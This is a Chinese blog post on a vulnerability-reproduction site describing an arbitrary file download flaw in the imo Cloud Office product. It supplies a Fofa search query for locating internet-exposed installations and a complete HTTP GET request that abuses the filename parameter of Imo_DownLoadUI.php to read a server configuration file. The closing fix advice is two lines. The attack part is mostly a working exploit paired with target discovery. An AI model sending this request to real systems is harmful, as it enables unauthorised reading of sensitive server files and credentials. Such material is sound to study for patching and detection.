imo云办公室 Imo_DownLoadUI.php 任意文件下载漏洞复现

已于 2024-09-16 10:35:55 修改
阅读量141 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
于 2024-09-16 10:35:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142299550
版权

0x01 漏洞描述:

    imo云办公室由上海易睦网络科技有限公司于2007年创立,总部位于上海,imo云办公室管理运营企业即时通讯平台imo,包括对imo的在线支持,故障处理,客户服务等,对imo进行持续研发,提供在线升级等。由于 /file/Placard/upload/Imo_DownLoadUI.php 页面 filename 参数过滤不严,导致可以读取系统敏感文件。

0x02 搜索语句:

Fofa:app="IMO-云办公室"

0x03 漏洞复现:

GET /file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Host: your-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

0x04 修复建议: 

如非必要请关闭互联网访问端口或限制接口访问

接口参数假加上读取校验

iSee857
关注
专栏目录
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1833
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
imo for android 4.4.2,IMO Apk For Android Free Download
weixin_42613583的博客
05-28 3984
IMO Apk For Android Free DownloadPosted By admin on Oct 20, 2017 |Download IMO Apk for Android|IMO apkfor Android is a free video calling application which allows you to make free unlimited video c...
gflags_static.lib 无法解析的外部符号 __imp__PathMatchSpec解决方法
linjingtu的博客
06-23 592
解决方法: 原因是因为少配置了相应的.lib文件 在项目属性->链接器->输入->附加依赖项->加上shlwapi.lib->点击应用即可
error C1083: 无法打开包括文件: “ui_roadquery.h”: No such file or directory c:\users\administrator\desktop\g_...
weixin_33873846的博客
09-10 1687
1.我这里出现的原因是忘记将项目文件添加进入项目中,在项目中右击添加即可 转载于:https://www.cnblogs.com/xian-yongchao/p/9620759.html
PHP--远程命令执行漏洞CVE-2018-19518复现
从不专注的人的博客
06-28 652
目录漏洞介绍漏洞复现进入容器移除环境 漏洞介绍 -php imap扩展用户在php中执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令。 -debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等。 -ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行
imo服务器文件保留,LOTFUN 文件管理服务器
weixin_39770226的博客
08-01 330
处理器:CPU类型Intel 至强E5-2670 V2CPU型号:Xeon E5-2670 V2CPU最大频率:2.5-3.3GHz标配CPU数量:1颗最大CPU数量:2颗制程工艺:22nm三级缓存:25M总线规格:QPI 8GT/s:2CPU核心:10核(Sandy Bridge EP)CPU线程数:20线程主板:英特尔 C602扩展槽:1×半高半长PCI-E x8插槽(x8接口)内存:内存类型...
imo办公室与RTX竞品分析报告
weixin_30629977的博客
07-15 224
一、市场状况 根据易观智库发布的《中国企业级SaaS市场分析报告2015》,2016年中国企业级SaaS市场的总体规模将达到300多亿。并且,企业服务市场远不止于目前的SaaS市场,一旦企业日常经营互联网化,形成企业场景下的O2O,万亿级企业服务市场的主体便形成了。 IM具备高频、刚需的特征,能把碎片化的企业沟通和协作集合在一起,具备覆盖企业职能和场景的能力,未来极有可能成为企业服务的入口。今...
python对象file的init_Python`__init __.py`和代码中对象的初始化
weixin_39649736的博客
12-09 245
我已经阅读了关于__init__.py文件的文档和一些关于SO的好问题,但我仍然对它的正确用法感到困惑.上下文我有一个包含许多包和子包的代码.我已经定义了许多类,其中一些我需要为整个用户会话创建一个(并且只有一个)实例.然后,这些新对象将在代码的不同部分中使用,这样,无论何时我(或用户)更新此对象中的数据/信息,它都将在所有代码中使用,而无需更改任何其他内容.为了更清楚,让我告诉你一个我正在谈论的...
IMO办公室
weixin_34206899的博客
02-28 298
imo-Instant Messaging Office(Instant Messaging Office,互联网即时通讯办公室),基于互联网和成熟的即时通信技术,为中国企业提供企业专属的、可管理即时通信、办公协作、和在线应用服务,同时,基于imo平台,为广大企业和组织提供包括:电子传真、企业短信、在线商机、海量企业库查询、精准营销服务、网络会议室、在线ERP、移动...
imo_log_240212_160724.zip
02-12
标题“imo_log_240212_160724.zip”表明这是一个日志文件的压缩包,日期范围从240212(可能是错误的日期格式,通常日期格式为年月日)到160724(可能是2016年7月24日)。日志文件是系统、应用或服务记录事件和操作的...
imo_6.apk
10-24
imo_6.apk
IMO SN.1/Circ.289 AIS 适用专用电文应用导则 英文原版
11-10
IMO SN.1/Circ.289 AIS 适用专用电文应用导则》是2010年IMO发布的一份重要文件,旨在为AIS应用特定消息(Application-Specific Messages, ASM)的使用提供指导。这份指南在MS委员会的第七十八届会议(2004年5月12...
(新ECDIS规范)IMO-MSC.1-Circ.1609-航行设备用户界面设计标准化指南的技术通告
02-22
### 新ECDIS规范——IMO-MSC.1-Circ.1609航行设备用户界面设计标准化指南 #### 一、背景与意义 国际海事组织(IMO)于2019年的第101届海上安全委员会会议上,通过了MSC.1/Circ.1609通函的形式,发布了航行设备用户...
s57int1_xref.zip_Electronic Chart_s57_海图_电子海图
07-14
S57是国际海事组织(IMO)制定的一种国际标准,全称为“International Hydrographic Organization Digital Chart Standard”,即国际水道测量组织数字海图标准。这个标准定义了如何结构化、编码和传输用于ECDIS的...
AI在医学领域:医学AI的安全与隐私全面概述
声纹感知 洞察芯声
09-12 1379
本文通过系统化地检查医疗应用领域并为未来的攻击研究奠定基础,提供一个医疗领域AI攻击研究的全面视角。
SSHamble:一款针对SSH技术安全的研究与分析工具
FreeBuf_的博客
09-11 1139
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
无限边界:现代整合安全如何保护
最新发布
网络研究观
09-15 671
通过工具之间更有效的数据共享,整合的安全平台还应提供更紧密的安全集成以及更强的系统可视性(无论是在端还是在本地),让您能够看到无限周界的边缘。
伙房食堂电气安全新挑战:油烟潮湿环境下,如何筑起电气火灾“防火墙”?
acrel002的博客
09-12 514
安科瑞的智能安全配电装置打破了传统用电防护领域中仅仅只能做到“事后处理”的技术瓶颈,提前将配电转换安全电,从源头抑制电弧火花的产生,大大降低火灾风险,同时系统实时监测电气线路中电压、电流、功率、温度、剩余(漏)电流、对地绝缘阻值等关键数据,智能识别电路异常风险,及时将报警信息传送至管理系统,提醒用户单位及时进行故障排查。近几年,随着我国经济的飞速发展,食堂餐饮也经历了一场变革,越来越多的电器走进了伙房食堂中,实现了电气化,为人们提供了高效便利的饮食服务,但同时也增加了火灾负荷。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值